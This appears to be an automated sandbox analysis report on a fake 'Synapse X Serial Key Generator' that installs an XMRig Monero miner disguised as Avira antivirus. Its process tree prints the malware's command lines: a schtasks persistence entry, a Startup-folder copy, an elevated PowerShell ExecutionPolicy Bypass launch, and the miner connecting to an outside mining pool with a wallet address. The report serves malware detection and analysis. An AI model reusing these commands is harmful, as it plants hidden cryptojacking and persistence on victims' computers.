Overview

overview

10

Static

static

3

Synapse X ...or.exe

windows7-x64

10

Synapse X ...or.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24-12-2024 21:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Synapse X Serial Key Generator.exe

  • Size

    600KB

  • MD5

    768b21c1c518aa0258ebf0c3af5c5aaa

  • SHA1

    81baff6aae38f8103457d15313166b571623be94

  • SHA256

    54490440082d4db95180097552899a6c178d4bb90bba15390ba668088adf867b

  • SHA512

    f684171d80146123a2eae78af97b4be318167a9ca4ad17e5c8017cb4f51876eb73c98f41791126d27eb170e032dd291bf28f970db7d5c3e8f23c9381f4a4ebe3

  • SSDEEP

    12288:ymkOy/IwEUvC+Q3gwUVN9WCWqsDgpbaN8rO1X3m1PYGapR7pSiha0bKqgqZ6J3N:yfOy0Uq0jiqsEpbVkXgPYFpR7of0bDgl

Score
10/10
xmrigdiscoveryexecutionminer

Malware Config

Signatures

  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 1 IoCs
    miner
  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Drops file in Program Files directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Synapse X Serial Key Generator.exe
    "C:\Users\Admin\AppData\Local\Temp\Synapse X Serial Key Generator.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Users\Admin\AppData\Local\Temp\is-8C2SJ.tmp\is-AE6KR.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-8C2SJ.tmp\is-AE6KR.tmp" /SL4 $30150 "C:\Users\Admin\AppData\Local\Temp\Synapse X Serial Key Generator.exe" 380631 52224
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C ""C:\Program Files (x86)\Avira Antivir\avirascan.bat""
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Windows\SysWOW64\schtasks.exe
          Schtasks.exe /create /F /tn "Avira routine scan" /tr "C:\Program Files (x86)\Avira Antivir\Check for updates.bat" /SC DAILY
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3020
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /s /y /k /f "C:\Program Files (x86)\Avira Antivir\Check for updates.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:2428
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C ""C:\Program Files (x86)\Avira Antivir\check for updates.bat""
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2308
        • C:\Program Files (x86)\Avira Antivir\quiet.exe
          "C:\Program Files (x86)\Avira Antivir\quiet.exe" "C:\Program Files (x86)\Avira Antivir\Updater.bat"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1748
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Program Files (x86)\Avira Antivir\Updater.bat" "
            5⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2140
            • C:\Windows\SysWOW64\PING.EXE
              PING 127.0.0.1 -n 99
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2644
            • C:\Windows\SysWOW64\tasklist.exe
              TASKLIST
              6⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2852
            • C:\Windows\SysWOW64\findstr.exe
              FINDSTR /I "Avira_Antivirus.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1008
            • C:\Program Files (x86)\Avira Antivir\svchost.exe
              "C:\Program Files (x86)\Avira Antivir\svchost.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:796
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\27DB.tmp\27DC.tmp\27DD.bat "C:\Program Files (x86)\Avira Antivir\svchost.exe""
                7⤵
                • Loads dropped DLL
                PID:1376
                • C:\Program Files (x86)\Avira Antivir\Avira_Antivirus.exe
                  "C:\Program Files (x86)\Avira Antivir\Avira_Antivirus.exe" -B -t 2 --av=2 -a cryptonight -o stratum+tcp://monero.hashvault.pro:3333 -p x -u 49J1Cj8k5TtErN671Zmn17AanxFGJ2Nfo8iC5NC5BXS8eTxvzm2dgWqASMgJxiDAPxYC4UJK51JnbLTDNdSNNnDEJSwoCvK
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1068
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C ""C:\Program Files (x86)\Avira Antivir\Run_Compatibility_test.bat""
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3052
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Start-Process powershell \"-ExecutionPolicy Bypass -NoProfile -Command `\"cd \`\"C:\Program Files (x86)\Avira Antivir\`\"; & \`\".\Compatibility test.ps1\`\"`\"\" -Verb RunAs"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2696
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "cd \"C:\Program Files (x86)\Avira Antivir\"; & \".\Compatibility test.ps1\""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2364

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\Avira Antivir\Avirascan.bat
    Filesize

    304B

    MD5

    44a6f57b27b11ae80d9c787214b808d6

    SHA1

    28f4ff3c701e136949ebcb617ae0f1a34aa87b04

    SHA256

    85ba142fdf106f20c9581f5db6a7e9276f30507e16cc36fec75eac321dfea04d

    SHA512

    aaa835dd2ae0eb3cb44012ac660ad709323564fe501096d6ede9e031e4f2944396bc412aaa1b3a46f0fa491a6bfef498185b47c93dd3a4e3c24814422d36b33f

    Download Submit

  • C:\Program Files (x86)\Avira Antivir\Check for updates.bat
    Filesize

    99B

    MD5

    e98eaf489be68539b1e534fbfb887cd7

    SHA1

    2eed32f0e1d68bdad2c79f8c962a516ca3c42baf

    SHA256

    8c004e9a1781212c0a81706a28cd4868f47c37af08da41120b6992b33122929e

    SHA512

    0efbec60d68a4d5219b1aaec8c66c412f4f4ccc15b89006d7f0da465c284bd67ec575d7b603332c6d8b768179d666ba95154159f874136001d62c4ed4e393bee

    Download Submit

  • C:\Program Files (x86)\Avira Antivir\Compatibility test.ps1
    Filesize

    70B

    MD5

    01542a8795f6f1997e33b0bfbea9dd78

    SHA1

    e8f57a9f2793f563670a527b1defc753f09fbac4

    SHA256

    10fbf5b5811b682df16734afd9dccec60581199e7ed0942d76e29b9b174b7b9b

    SHA512

    46234208c315a7e19a7b07bdfb2204d244f68058c7311bb858a656ae1908af32631120b3e26265b981724ee546abe360a017807745d01cfae0fcbec5b77d6138

    Download Submit

  • C:\Program Files (x86)\Avira Antivir\Run_Compatibility_test.bat
    Filesize

    207B

    MD5

    b1b5ee8f2b578031841dc89e273224e5

    SHA1

    34c89f703a43f37714e2218ed4ae60122d5a1276

    SHA256

    95c95de40de6af56f8c2317a37e5a6c31833d3e9877e100906c71998aff537bc

    SHA512

    74cc0880a8589ff61d45e1eb6a97106336b548b0bb36c0d46a89bf9a1ce818bae80c727e70c36dc270f13f77795a0d61ae10b4715d1096e8900b2e7775575d53

    Download Submit

  • C:\Program Files (x86)\Avira Antivir\Updater.bat
    Filesize

    325B

    MD5

    0781fd3b349ab76c9e7cd5390b293288

    SHA1

    df47190a051b8d09bb68c4f58f162dcddefd2d2f

    SHA256

    9dc67ccbb44a3c707b2161d50edca22e616b5afce08e36e5b998ff7322eae247

    SHA512

    098e3bc28368f033e03911dcea5760ec67e26dd9c5642ccc147ee6e297e07876983ec040794bbb0caa4b50c309b119c50a7be4ab36488904c049757963a6e45b

    Download Submit

  • C:\Program Files (x86)\Avira Antivir\quiet.exe
    Filesize

    136KB

    MD5

    935809d393a2bf9f0e886a41ff5b98be

    SHA1

    1ed3fc1669115b309624480e88c924b7b67e73bb

    SHA256

    c92904610319843578ada35fb483d219b0d07da69179d57c7e1223cab078492c

    SHA512

    46bccaaba4b8b4cfa247f48b55998d13b37f714ac69f6b08a97b6b8075f61233545406bc9f8db7d2848f1831eeb506da650b72d7d3a2f624e51eccd5fc537bc5

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\27DB.tmp\27DC.tmp\27DD.bat
    Filesize

    246B

    MD5

    515d11bc1a7e5c32dd84490c21f1a34f

    SHA1

    675de6fe556597590b5987e9cb383ac7fc16204d

    SHA256

    d21c83ee418929ca72c8f8fe0a649f9a78e6ac67cb122826739917cf32feb2ae

    SHA512

    ba69e274e72d6170c9ec7c59afb55b62bed430db5587def5c792b34898b5b09799bfa5fcd48cfff96fc780f207ae5fd3b3d901d1579f99097b0fc316c2813e01

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    c970d1cc767153136b8354e3eb403411

    SHA1

    d1d644a4379d37ff4eed8b85a9dc2bd436f61527

    SHA256

    6ea315ae4fea92c10004177bf3c3852c08b887eb425fe59ca3aa861664c85526

    SHA512

    79c7bd1e37d087faeda9b87c2b48b0d2b85044f2ee3c9a67d917ebe17717814a829961b7936c9a5c3e3f3e4b57e52a192f7520b06e143536aba3db434e5af443

    Download Submit

  • \Program Files (x86)\Avira Antivir\Avira_Antivirus.exe
    Filesize

    682KB

    MD5

    3716f0ec45591b01acf1c9289b72b0a4

    SHA1

    041ec74ef4c2acee0ff04e4c69789dd9f8b00c14

    SHA256

    ea6439e39c6ca1ec1e00b7f408dc6c15dd9c7af3bec972bcbfb4371802f443bd

    SHA512

    39d1f9b3ab3cc515d77dcc83700c32863c05e6ad97014b0ecd00d7a8ea2b0767f2e4780c9570b69c69b032657524c06def333a2d3c7f64dcc358b89fdb27c724

    Download Submit

  • \Program Files (x86)\Avira Antivir\svchost.exe
    Filesize

    86KB

    MD5

    2eee654c2250c858f6af0f08e65a9241

    SHA1

    879b7f12fd3c80f2a759d44db6c246d83e92977b

    SHA256

    e7286a68156427d2e610e899d4aa3d0e44cdeb00ca710e19298dd7443a3bac48

    SHA512

    6f21e18e8808fd1215e116d782f077193e06cdd0512e6b681cd3c443528e869f88943db89e6973c8a9b12847020dc853249b19b6015cdb7f32fd509d56780879

    Download Submit

  • \Users\Admin\AppData\Local\Temp\is-8C2SJ.tmp\is-AE6KR.tmp
    Filesize

    652KB

    MD5

    581bb44526a65c02b388e1b8a83fe86c

    SHA1

    dc387f115977b5fb94d9c9084f33a1c231b50acb

    SHA256

    385a9bb48f5180984867f3bff1d327250d22ab4399137b343be291c370ee3699

    SHA512

    aab4cb6dd5ad4ebfded18748c5cd1a4361c154459f36a4cb49e32855b6866f92d3f065cd9cafa16e621a4216bb176f1554a8bbea7fd458b317eb1ff4c3c2bea1

    Download Submit

  • \Users\Admin\AppData\Local\Temp\is-HUA70.tmp\_isetup\_shfoldr.dll
    Filesize

    22KB

    MD5

    92dc6ef532fbb4a5c3201469a5b5eb63

    SHA1

    3e89ff837147c16b4e41c30d6c796374e0b8e62c

    SHA256

    9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

    SHA512

    9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

    Download Submit

  • memory/1720-52-0x0000000000400000-0x00000000004B2000-memory.dmp

    Filesize

    712KB

    Download

  • memory/1720-16-0x0000000000400000-0x00000000004B2000-memory.dmp

    Filesize

    712KB

    Download

  • memory/1748-44-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

    Download

  • memory/2136-54-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

    Download

  • memory/2136-3-0x0000000000401000-0x000000000040A000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2136-0-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

    Download